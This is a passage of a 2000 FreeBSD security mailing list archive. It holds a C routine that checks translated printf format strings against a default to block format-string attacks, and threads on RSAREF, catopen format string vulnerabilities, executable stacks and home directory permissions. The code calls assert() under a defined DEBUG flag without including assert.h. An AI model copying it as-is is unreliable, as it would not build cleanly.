 * Aaron out.
 */

/* ========== START OF HEADER ========== */

/* These two function prototypes should really be in a header file */

#include <stdlib.h>	/* size_t, malloc() and free() */
#include <string.h>	/* strlen() and strcmp() */

/*
 * Name:        safe_fmtstr
 *
 * Parameters:
 *     default_fmt   The default format string
 *     pref_fmt      A preferred format string
 *     fmt_len       The maximum length permitted
 *
 * The two format strings are analyzed.  If the format
 * specifiers in both format strings match exactly and
 * if the preferred format string does not exceed the
 * maximum length permitted, it is considered safe.
 *
 * Return values:
 *
 *     The pref_fmt string is returned IF it matches exactly
 *     the format specifiers found in default_fmt AND if the
 *     pref_fmt does not exceed the maximum length.
 *
 *     If the pref_fmt string does not match (is unsafe) or
 *     if it exceeds the maximum length, the default_fmt string
 *     is returned instead.
 *
 *     If the fmt_len parameter is zero, the maximum length
 *     permitted is infinity.
 *
 */
char *safe_fmtstr(char *default_fmt, char *pref_fmt, size_t fmt_len);

/*
 * Name:        compress_fmtstr
 * Parameters:
 *     fmt           A single C-style string containing a printf()
 *                   type format string.
 *
 * This function analyzes the passed printf() format string and
 * returns a compressed C-style string that represents the number
 * and types of format items found in the format string.
 *
 * Return values:
 *
 *     On success, a non-null C-string is returned.  The caller is
 *     responsible to free this returned string (since it was allocated
 *     using malloc()) when the caller is finished with it.
 *
 *     On failure, a null value (char *)0 is returned instead.
 */
char *compress_fmtstr(char *fmt);

/* ========== END OF HEADER ========== */

#define DEBUG

#ifdef DEBUG
#include <stdio.h>	/* debugging output */
#endif

/*
 * Assumptions this code makes:
 *
 *   1. Any string that matches the following perl regular
 *      expression is considered a format specifier:
 *          m/%[#+ 0-]*[0-9*]*(\.[0-9*]*)?[diouXxfeEgGcs%]/
 *   2. This code treats the '\' character as just another
 *      ordinary non-format specifier character.
 *   3. Character sequences that partially match the above
 *      perl regular expression are invalid or incomplete
 *      format specifiers, but this code will still treat the
 *      sequence the same way valid and complete format
 *      specifiers are treated.
 *   4. As shown in the above perl regular expression, this code
 *      assumes NO MAXIMUM length of the format specifier or the
 *      several subsections thereof.
 *
 * Please let the author know if any of these assumptions are
 * invalid or dangerous.
 *
 * This code uses a very simple finite state parsing machine to
 * count the number of format items and the types.
 *
 * A few quick definitions for the finite state parsing machine:
 *
 *   FMT_START       Exactly ONE occurrence of the '%' character
 *   FMT_FLAG        ZERO or MORE of the following characters:
 *                   '#', '+', ' ', '0', or '-'
 *   FMT_WIDTHSTART  ZERO or ONE of the following characters:
 *                   digits '1' through '9', or the '*' character
 *   FMT_WIDTH       ZERO or MORE of the following characters:
 *                   digits '0' through '9', or the '*' character
 *   FMT_DOT         ZERO or ONE occurrences of the '.' character,
 *                   a precision specification or end of FMT_WIDTH
 *   FMT_PREC        ZERO or MORE of the following characters:
 *                   digits '0' through '9', or the '*' character
 *   FMT_FORMAT      Exactly ONE of the following characters:
 *                   'd', 'i', 'o', 'u', 'X', 'x', 'f', 'e', 'E', 'g',
 *                   'G', 'c', 's', or '%'
 *
 * Finite state parsing machine states:
 *
 *   STATE:       MEANING:
 *   MODE_CHAR    NO formatting has yet been encountered - expecting
 *                FMT_START or more ordinary characters or escape
 *                sequences.
 *   MODE_START   FMT_START encountered - expecting FMT_FLAG | FMT_WIDTHSTART |
 *                FMT_DOT | FMT_FORMAT
 *   MODE_FLAG    FMT_FLAG encountered - expecting FMT_FLAG | FMT_WIDTHSTART |
 *                FMT_DOT | FMT_FORMAT (flags may repeat, per the regular
 *                expression above)
 *   MODE_WIDTH   FMT_WIDTH encountered - expecting FMT_WIDTH | FMT_DOT |
 *                FMT_FORMAT
 *   MODE_DOT     FMT_DOT encountered - expecting FMT_PREC | FMT_FORMAT
 *   MODE_PREC    FMT_PREC encountered - expecting FMT_PREC | FMT_FORMAT
 *   MODE_FORMAT  FMT_FORMAT encountered - ALL DONE - this mode really
 *                doesn't exist since the formatting is finished at this
 *                point and the mode will revert back to MODE_CHAR.
 */

/* State machine modes */
#define MODE_CHAR   0
#define MODE_START  1
#define MODE_FLAG   2
#define MODE_WIDTH  3
#define MODE_DOT    4
#define MODE_PREC   5

/* Some defines for inlining parsing character comparisons */
#define FMT_START_TEST \
    *ch == '%'
#define FMT_WIDTHSTART_TEST \
    '1': \
    case '2': \
    case '3': \
    case '4': \
    case '5': \
    case '6': \
    case '7': \
    case '8': \
    case '9': \
    case '*'
#define FMT_WIDTH_TEST \
    '0': \
    case '1': \
    case '2': \
    case '3': \
    case '4': \
    case '5': \
    case '6': \
    case '7': \
    case '8': \
    case '9': \
    case '*'
#define FMT_PREC_TEST FMT_WIDTH_TEST
#define FMT_FLAG_TEST \
    '#': \
    case '+': \
    case '-': \
    case ' ': \
    case '0'
#define FMT_DOT_TEST '.'
#define FMT_FORMAT_TEST \
    'd': \
    case 'i': \
    case 'o': \
    case 'u': \
    case 'X': \
    case 'x': \
    case 'f': \
    case 'e': \
    case 'E': \
    case 'g': \
    case 'G': \
    case 'c': \
    case 's': \
    case '%'

/* And some inlined action code */
#define DO_MODE_START {\
    mode = MODE_START; \
    }
#define DO_MODE_FLAG {\
    if (buf != (char *)0) \
        *buf++ = *ch; \
    formatlen++; \
    mode = MODE_FLAG; \
    }
#define DO_MODE_WIDTH {\
    if (buf != (char *)0) \
        *buf++ = *ch; \
    formatlen++; \
    mode = MODE_WIDTH; \
    }
#define DO_MODE_DOT {\
    if (buf != (char *)0) \
        *buf++ = *ch; \
    formatlen++; \
    mode = MODE_DOT; \
    }
#define DO_MODE_PREC {\
    if (buf != (char *)0) \
        *buf++ = *ch; \
    formatlen++; \
    mode = MODE_PREC; \
    }
#define DO_MODE_FORMAT {\
    if (buf != (char *)0) \
        *buf++ = *ch; \
    formatlen++; \
    mode = MODE_CHAR; \
    }
#define DO_INVALID_FORMAT {\
    if (buf != (char *)0) \
        *buf++ = '*'; \
    formatlen++; \
    mode = MODE_CHAR; \
    }

/*
 * INTERNAL USE ONLY - This function implements the finite state
 * format scanning engine. The arguments are the format string
 * and an optional buffer in which to write the compressed
 * format representation. It is INTERNAL ONLY because it MUST
 * be called once with a null buffer so as to count how many
 * format items there are. Then the second time, a buffer of
 * sufficient length can be passed to the routine. If a person
 * were foolish enough to just pass in an arbitrary buffer, there
 * is the possibility of buffer overflow. So DON'T DO IT!
 *
 * Returns the size of the buffer required (including space for the
 * terminating byte and in some cases, some extra "work" space).
 */

/*
 * Name: scan_fmtstr
 * Parameters:
 *     fmt     A C-style string containing a printf()-like
 *             format string.
 *     buf     Another C-style string buffer OR NULL
 *
 * This function is intended for INTERNAL USE ONLY by the other
 * functions in this file. It implements the finite state
 * machine.
 *
 * Return values:
 *
 *     The function returns the size of a C-style string buffer
 *     required to hold a compressed format string (including a
 *     byte for the C-string terminator character '\0').
 *
 *     If called with a NULL buf parameter, the parser only returns
 *     the expected buffer size. If called with a NON-NULL buf
 *     parameter, that non-NULL buffer will contain the compressed
 *     string of exactly the size (including terminating '\0' char.)
 *     that the return value indicates.
 *
 * WARNING:
 *     If the passed buffer is too small, this function will
 *     overflow/overrun the buffer. That is why it is recommended
 *     that this function FIRST be called with a NULL buf parameter
 *     to determine the size of buffer required, then the function
 *     be called a second time (using the exact same format string)
 *     with a buffer of sufficient size.
 */
size_t scan_fmtstr(char *fmt, char *buf)
{
    char *ch;
    size_t formatlen = 0;
    size_t maxlen = 0;
    int mode = MODE_CHAR;

    /*
     * Shortcut if the format string is null. The terminator is
     * still written, so report one byte as the required size
     * (returning 0 here would make compress_fmtstr() malloc(0)
     * and then write the terminator past the end of it).
     */
    if (fmt == (char *)0) {
        if (buf != (char *)0)
            *buf = (char)0;
        return 1;
    }

    /*
     * Finite state machine. If the passed buffer variable buf
     * is null (buf == (char *)0) then we just count the format
     * specifications. If it is non-null, we assume that a
     * count has already been done on this format string in the
     * past and a sufficient C string has been allocated for the
     * buffer so we can safely copy format items into it.
     */
    for (ch = fmt; *ch; ch++) {
        switch (mode) {
        case MODE_CHAR:
            if (FMT_START_TEST)
                DO_MODE_START;
            break;
        case MODE_START:
            switch (*ch) {
            case FMT_FLAG_TEST:
                DO_MODE_FLAG;
                break;
            case FMT_WIDTHSTART_TEST:
                DO_MODE_WIDTH;
                break;
            case FMT_DOT_TEST:
                DO_MODE_DOT;
                break;
            case FMT_FORMAT_TEST:
                DO_MODE_FORMAT;
                break;
            /* Invalid Format */
            default:
                DO_INVALID_FORMAT;
            }
            break;
        case MODE_FLAG:
            switch (*ch) {
            /* Flags may repeat ("%-05d"): FMT_FLAG is ZERO or MORE */
            case FMT_FLAG_TEST:
                DO_MODE_FLAG;
                break;
            case FMT_WIDTHSTART_TEST:
                DO_MODE_WIDTH;
                break;
            case FMT_DOT_TEST:
                DO_MODE_DOT;
                break;
            case FMT_FORMAT_TEST:
                DO_MODE_FORMAT;
                break;
            /* Invalid Format */
            default:
                DO_INVALID_FORMAT;
            }
            break;
        case MODE_WIDTH:
            switch (*ch) {
            case FMT_WIDTH_TEST:
                DO_MODE_WIDTH;
                break;
            case FMT_DOT_TEST:
                DO_MODE_DOT;
                break;
            case FMT_FORMAT_TEST:
                DO_MODE_FORMAT;
                break;
            /* Invalid Format */
            default:
                DO_INVALID_FORMAT;
            }
            break;
        case MODE_DOT:
            switch (*ch) {
            case FMT_PREC_TEST:
                DO_MODE_PREC;
                break;
            case FMT_FORMAT_TEST:
                DO_MODE_FORMAT;
                break;
            /* Invalid Format */
            default:
                DO_INVALID_FORMAT;
            }
            break;
        case MODE_PREC:
            switch (*ch) {
            case FMT_PREC_TEST:
                DO_MODE_PREC;
                break;
            case FMT_FORMAT_TEST:
                DO_MODE_FORMAT;
                break;
            /* Invalid Format */
            default:
                DO_INVALID_FORMAT;
            }
            break;
        default:
            /* This should NEVER happen! */
#ifdef DEBUG
            assert(0);
#endif
            break;
        }
    }
    /* A '%' sequence still open at end of string is incomplete */
    if (mode != MODE_CHAR)
        DO_INVALID_FORMAT;
    if (buf != (char *)0)
        /* Terminate the buffer with the C '\0' terminator character */
        *buf = (char)0;
    /*
     * Return the size of buffer required (with space for the
     * terminating byte)
     */
    return ((maxlen > formatlen) ?
            maxlen : formatlen) + 1;
}

char *compress_fmtstr(char *fmt)
{
    size_t len = scan_fmtstr(fmt, (char *)0);
    char *buf = (char *)malloc(len * sizeof(char));

    if (buf == (char *)0) {
        /* malloc() must have failed - return NULL */
        return buf;
    }
    scan_fmtstr(fmt, buf);
    return buf;
}

char *safe_fmtstr(char *default_fmt, char *pref_fmt, size_t fmt_len)
{
    char *a, *b;

    /* No preferred format at all: nothing to compare, keep the default */
    if (pref_fmt == (char *)0)
        return default_fmt;

    /* If the preferred format length exceeds the limit, return the default */
    if (fmt_len > 0 && strlen(pref_fmt) > fmt_len)
        return default_fmt;

    a = compress_fmtstr(default_fmt);
    if (a == (char *)0) {
        /* malloc() must have failed - default to original format */
        return default_fmt;
    }
    b = compress_fmtstr(pref_fmt);
    if (b == (char *)0) {
        /* malloc() must have failed - default to original format */
        free(a);
        return default_fmt;
    }
    if (strcmp(a, b)) {
        /*
         * The pref_fmt string does NOT match the default_fmt
         * string's format specifiers, and so is considered
         * UNSAFE. Return the default.
         */
        free(a);
        free(b);
        return default_fmt;
    }
    /*
     * The pref_fmt string does MATCH the default_fmt
     * string's format specifiers exactly, so it is considered
     * SAFE. Return the preferred format.
     */
    free(a);
    free(b);
    return pref_fmt;
}

#if 0
/* FOR TESTING ONLY: */
#include <stdio.h>      /* printf() */

int main(int argc, char *argv[])
{
    char **a = argv;

    if (*a)
        a++;
    while (*a && **a) {
        /*
         * I'm deliberately not free()ing the malloc()ated strings that
         * the compress_fmtstr() function returns because this test code
         * can leak memory all it wants to.
         * ;)
         */
        printf("FORMAT STRING '%s' compresses to '%s'\n",
            *a, compress_fmtstr(*a));
        if (*(a+1))
            printf("safe_fmtstr('%s', '%s', 0) = '%s'\n",
                *a, *(a+1), safe_fmtstr(*a, *(a+1), 0));
        a++;
    }
    return 0;
}
#endif

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Fri Sep  8 10:43:23 2000
Delivered-To: freebsd-security@freebsd.org
Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 7963A37B424; Fri, 8 Sep 2000 10:43:20 -0700 (PDT)
Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id MAA11949; Fri, 8 Sep 2000 12:43:10 -0500 (CDT)
Date: Fri, 8 Sep 2000 12:43:09 -0500
From: "Matthew D. Fuller"
To: Kris Kennaway
Cc: Brett Glass, "Aaron D. Gifford", security@FreeBSD.ORG
Subject: Re: No more RSAREF???
Message-ID: <20000908124309.B9652@futuresouth.com>
References: <4.3.2.7.2.20000906165231.04a49e20@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from kris@FreeBSD.ORG on Wed, Sep 06, 2000 at 10:36:32PM -0700
X-OS: FreeBSD
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Sep 06, 2000 at 10:36:32PM -0700, a little birdie told me
that Kris Kennaway remarked
> On Wed, 6 Sep 2000, Brett Glass wrote:
>
> > This is good news! Will you also commit to -stable? Will OpenSSH
> > run properly out of the box after the commit? (So far, I've never
> > been able to get the version of OpenSSH in the base distribution to
> > work. It complains that RSAREF is missing, even after the RSAREF
> > port is installed.)
>
> Yes and yes.

Third request: Can the PRE_SMPNG tag be slid forward on the affected
files so those of us who plan to use it for a little while to see how it
goes can still play RSA games with everyone else? Or will setting the
MAKE_RSAINTL have close enough to the same effect as to not bother?
--
Matthew Fuller     (MF4839)   |  fullermd@over-yonder.net
Unix Systems Administrator    |  fullermd@futuresouth.com
Specializing in FreeBSD       |  http://www.over-yonder.net/
"The only reason I'm burning my candle at both ends, is because I haven't
figured out how to light the middle yet"

From owner-freebsd-security  Fri Sep  8 12:38:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mass.osd.bsdi.com (mass.osd.bsdi.com [204.216.28.234]) by hub.freebsd.org (Postfix) with ESMTP id 9211537B443; Fri, 8 Sep 2000 12:38:19 -0700 (PDT)
Received: from mass.osd.bsdi.com (localhost [127.0.0.1]) by mass.osd.bsdi.com (8.9.3/8.9.3) with ESMTP id UAA00530; Thu, 7 Sep 2000 20:24:33 -0700 (PDT) (envelope-from msmith@mass.osd.bsdi.com)
Message-Id: <200009080324.UAA00530@mass.osd.bsdi.com>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Warner Losh
Cc: "John Doh!", security@FreeBSD.ORG, hackers@FreeBSD.ORG
Subject: Re: How to stop problems from printf
In-reply-to: Your message of "Thu, 07 Sep 2000 20:59:18 MDT." <200009080259.UAA50393@harmony.village.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 07 Sep 2000 20:24:33 -0700
From: Mike Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> In message "John Doh!" writes:
> : Issue is must be getting format string from "untrusted" place, but want to
> : limit substitution of %... to the substitution of say in example the
> : argv[0], but to not do others so that say given "usage: %s filename %p" %p
> : not interpret but to be print instead as literally so we get output of
> : (saying to be argv[0] as test just for example) usage: test filename %p
> :
> : any hints you have I am very grateful for.
>
> Fix gettext to only allow N arguments in the same order that the
> original message had.

Typically you want to use positional arguments with printf so that your
gettext responses can reorder things to get better results, but the same
basically applies.

--
... every activity meets with opposition, everyone who acts has his
rivals and unfortunately opponents also. But not because people want
to be opponents, rather because the tasks and relationships force
people to take different points of view. [Dr. Fritz Todt]

From owner-freebsd-security  Fri Sep  8 13: 5: 4 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 665C337B42C; Fri, 8 Sep 2000 13:04:59 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA37481; Fri, 8 Sep 2000 13:04:59 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Fri, 8 Sep 2000 13:04:59 -0700 (PDT)
From: Kris Kennaway
To: "Matthew D. Fuller"
Cc: Brett Glass, "Aaron D. Gifford", security@FreeBSD.ORG
Subject: Re: No more RSAREF???
In-Reply-To: <20000908124309.B9652@futuresouth.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 8 Sep 2000, Matthew D. Fuller wrote:

> Third request: Can the PRE_SMPNG tag be slid forward on the affected
> files so those of us who plan to use it for a little while to see how it
> goes can still play RSA games with everyone else? Or will setting the
> MAKE_RSAINTL have close enough to the same effect as to not bother?

The PRE_SMPNG tag applies to -current. The RSA changes were committed
prior to the tag in -current, and the tag doesn't apply in -stable. But
MAKE_RSAINTL will have exactly the same effect anyway

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security  Fri Sep  8 13: 7:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 857A937B43E; Fri, 8 Sep 2000 13:07:31 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA39283; Fri, 8 Sep 2000 13:07:31 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Fri, 8 Sep 2000 13:07:31 -0700 (PDT)
From: Kris Kennaway
To: Gabor Zahemszky
Cc: freebsd-security@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <20000908144707.F682@zg.CoDe.hu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 8 Sep 2000, Gabor Zahemszky wrote:

> On Thu, Sep 07, 2000 at 02:53:51AM -0700, Kris Kennaway wrote:
> > HOWEVER: no program shipped in the FreeBSD base system is believed to be
> > vulnerable to either of these problems.
> >
> > They both affect catopen(), and we don't use that function at all except
> > in tcsh, which is non-privileged. We don't even have any code which has
>
> Oops!
>
> On my 3.4R system, there is a little utility, named: ee (and ree), and it
> is using catopen(). I don't think it changed in 4.x, is it?

They are not privileged applications. You won't get anywhere but back
where you started by exploiting them.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security  Fri Sep  8 14:15:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from almen.vxu.se (almen.vxu.se [194.47.99.100]) by hub.freebsd.org (Postfix) with ESMTP id D888037B50B for ; Fri, 8 Sep 2000 14:15:56 -0700 (PDT)
Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by almen.vxu.se (8.8.8/8.8.7) with SMTP id XAA23882 for ; Fri, 8 Sep 2000 23:15:54 +0200 (MET DST)
Message-ID: <001601c019da$05dc9140$6400a8c0@XGod>
From: "David Andreas Alderud"
To:
Subject: Set user stack area type?
Date: Fri, 8 Sep 2000 23:16:14 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Is there a way to change the type of the user stack area (i.e.
executable/non-executable)?

/Kind regards, David A. Alderud

From owner-freebsd-security  Fri Sep  8 14:21:40 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rocket.coresync.net (ns1.coresync.net [64.71.131.2]) by hub.freebsd.org (Postfix) with SMTP id C227937B440 for ; Fri, 8 Sep 2000 14:21:37 -0700 (PDT)
Received: (qmail 6917 invoked by uid 1117); 8 Sep 2000 21:12:40 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:12:40 -0000
Date: Fri, 8 Sep 2000 14:12:40 -0700 (PDT)
From: "Jonathan M. Slivko"
To: freebsd-security@freebsd.org
Subject: Home Directories -- in the point of security?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

What chmod value should I use when modifying home directories to allow for
a personal website on a webserver without compromising security of the
files from other users, even reading the files is out of the question
entirely.

----
Jonathan M. Slivko
Technical Support: CoreSync Corporation
NSI ID: JSR730

Want a reliable shell? check us out at
http://www.coresync.net!
----

From owner-freebsd-security  Fri Sep  8 14:29:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 4422D37B507 for ; Fri, 8 Sep 2000 14:29:50 -0700 (PDT)
Received: (qmail 36054 invoked by uid 1000); 8 Sep 2000 21:29:44 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:29:44 -0000
Date: Fri, 8 Sep 2000 17:29:42 -0400 (EDT)
From: Matt Heckaman
X-Sender: matt@epsilon.lucida.qc.ca
To: "Jonathan M. Slivko"
Cc: freebsd-security@freebsd.org
Subject: Re: Home Directories -- in the point of security?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Spam-Rating: localhost 1.6.2 0/1000/N
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 8 Sep 2000, Jonathan M. Slivko wrote:

: What chmod value should I use when modifying home directories to allow for
: a personal website on a webserver without compromising security of the
: files from other users, even reading the files is out of the question
: entirely.

Mode 0711 for directories will do what you want, without allowing anyone
else read access. Just make sure to educate your users about permissions,
so that they leave the settings right -inside- the dir. I force this by
making all my users umask 027, big help. :)

: ----
: Jonathan M. Slivko
: Technical Support: CoreSync Corporation
: NSI ID: JSR730

* Matt Heckaman - mailto:matt@lucida.qc.ca   http://www.lucida.qc.ca/   *
* GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 *

From owner-freebsd-security  Fri Sep  8 14:39:43 2000
Delivered-To: freebsd-security@freebsd.org
Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 94D5E37B505 for ; Fri, 8 Sep 2000 14:39:39 -0700 (PDT)
Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0) with ESMTP id e88LfBj04929; Fri, 8 Sep 2000 16:41:11 -0500 (CDT)
Date: Fri, 8 Sep 2000 16:41:11 -0500 (CDT)
From: Alex Charalabidis
To: "Jonathan M. Slivko"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Home Directories -- in the point of security?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 8 Sep 2000, Jonathan M. Slivko wrote:

> What chmod value should I use when modifying home directories to allow for
> a personal website on a webserver without compromising security of the
> files from other users, even reading the files is out of the question
> entirely.
>

Use 711 or 701 and fix the skeleton directory to make the files inside
that don't need to be readable 600.

-ac

--
==============================================================
Alex Charalabidis (AC8139)          5050 Poplar Ave, Ste 170
Systems Administrator               Memphis, TN 38157
WebNet Memphis                      (901) 432 6000
Author, The Book of IRC             http://www.bookofirc.com/
==============================================================

From owner-freebsd-security  Fri Sep  8 14:45:20 2000
Delivered-To: freebsd-security@freebsd.org
Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241]) by hub.freebsd.org (Postfix) with ESMTP id AD05437B446 for ; Fri, 8 Sep 2000 14:45:17 -0700 (PDT)
Received: (from alan@localhost) by agora.rdrop.com (8.8.7/8.8.7) id OAA10927; Fri, 8 Sep 2000 14:45:14 -0700 (PDT) (envelope-from alan)
Date: Fri, 8 Sep 2000 14:45:14 -0700
From: Alan Batie
To: Matt Heckaman
Cc: "Jonathan M. Slivko", freebsd-security@FreeBSD.ORG
Subject: Re: Home Directories -- in the point of security?
Message-ID: <20000908144513.I4603@agora.rdrop.com>
Mail-Followup-To: Matt Heckaman, "Jonathan M. Slivko", freebsd-security@FreeBSD.ORG
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: ; from matt@ARPA.MAIL.NET on Fri, Sep 08, 2000 at 05:29:42PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Sep 08, 2000 at 05:29:42PM -0400, Matt Heckaman wrote:
> Mode 0711 for directories will do what you want, without allowing anyone
> else read access.

Until someone leaves their .profile or .cshrc file writeable accidentally
because they don't understand unix permissions or are tricked into it.
Or someone guesses a file name. Or many other scenarios. The answer
I chose is to put the web directory somewhere else (/home/web/),
reconfigure the web server and leave the user directories 700.

--
Alan Batie                    ______     www.rdrop.com/users/alan   Me
alan@batie.org                \    /     www.qrd.org                The Triangle
PGPFP DE 3C 29 17 C0 49 7A     \  /      www.pgpi.com               The Weird Numbers
27 40 A5 3C 37 4A DA 52 B9      \/       www.anti-spam.net          NO SPAM!

From owner-freebsd-security  Fri Sep  8 14:47:22 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rocket.coresync.net (ns1.coresync.net [64.71.131.2]) by hub.freebsd.org (Postfix) with SMTP id 0ABC937B446 for ; Fri, 8 Sep 2000 14:47:18 -0700 (PDT)
Received: (qmail 25233 invoked by uid 1117); 8 Sep 2000 21:38:20 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:38:20 -0000
Date: Fri, 8 Sep 2000 14:38:08 -0700 (PDT)
From: "Jonathan M. Slivko"
To: Alan Batie
Cc: Matt Heckaman, freebsd-security@FreeBSD.ORG
Subject: Re: Home Directories -- in the point of security?
In-Reply-To: <20000908144513.I4603@agora.rdrop.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Actually, that sounds like an even better idea than what was suggested
before. Thanks Alan!

----
Jonathan M. Slivko
Technical Support: CoreSync Corporation
NSI ID: JSR730

Want a reliable shell? check us out at
http://www.coresync.net!
----

On Fri, 8 Sep 2000, Alan Batie wrote:

> On Fri, Sep 08, 2000 at 05:29:42PM -0400, Matt Heckaman wrote:
> > Mode 0711 for directories will do what you want, without allowing anyone
> > else read access.
>
> Until someone leaves their .profile or .cshrc file writeable accidentally
> because they don't understand unix permissions or are tricked into it.
> Or someone guesses a file name. Or many other scenarios. The answer
> I chose is to put the web directory somewhere else (/home/web/),
> reconfigure the web server and leave the user directories 700.
>
> --
> Alan Batie                    ______     www.rdrop.com/users/alan   Me
> alan@batie.org                \    /     www.qrd.org                The Triangle
> PGPFP DE 3C 29 17 C0 49 7A     \  /      www.pgpi.com               The Weird Numbers
> 27 40 A5 3C 37 4A DA 52 B9      \/       www.anti-spam.net          NO SPAM!
>

From owner-freebsd-security  Fri Sep  8 14:50:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id D1AFC37B506 for ; Fri, 8 Sep 2000 14:50:07 -0700 (PDT)
Received: (qmail 36206 invoked by uid 1000); 8 Sep 2000 21:50:07 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 Sep 2000 21:50:07 -0000
Date: Fri, 8 Sep 2000 17:50:06 -0400 (EDT)
From: Matt Heckaman
X-Sender: matt@epsilon.lucida.qc.ca
To: Alan Batie
Cc: "Jonathan M. Slivko", freebsd-security@FreeBSD.ORG
Subject: Re: Home Directories -- in the point of security?
In-Reply-To: <20000908144513.I4603@agora.rdrop.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Spam-Rating: localhost 1.6.2 0/1000/N
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 8 Sep 2000, Alan Batie wrote:
...
: Until someone leaves their .profile or .cshrc file writeable accidentally
: because they don't understand unix permissions or are tricked into it.
: Or someone guesses a file name. Or many other scenarios. The answer
: I chose is to put the web directory somewhere else (/home/web/),
: reconfigure the web server and leave the user directories 700.

Exactly. That is why the umask is 027 (set by /etc/login.conf). So, for a
user to get unsafe permissions, they would have to go out of their way and
set the permission. There are no defaults that leave a file vulnerable to
the above with that setup. Since for it to fail, it depends on the user
manually modifying the file permissions. At that point, I step back since
they could just as easily do chmod 777 /usr/home/$user. :)

: --
: Alan Batie                    ______     www.rdrop.com/users/alan   Me
: alan@batie.org                \    /     www.qrd.org                The Triangle
: PGPFP DE 3C 29 17 C0 49 7A     \  /      www.pgpi.com               The Weird Numbers
: 27 40 A5 3C 37 4A DA 52 B9      \/       www.anti-spam.net          NO SPAM!
* Matt Heckaman - mailto:matt@lucida.qc.ca   http://www.lucida.qc.ca/   *
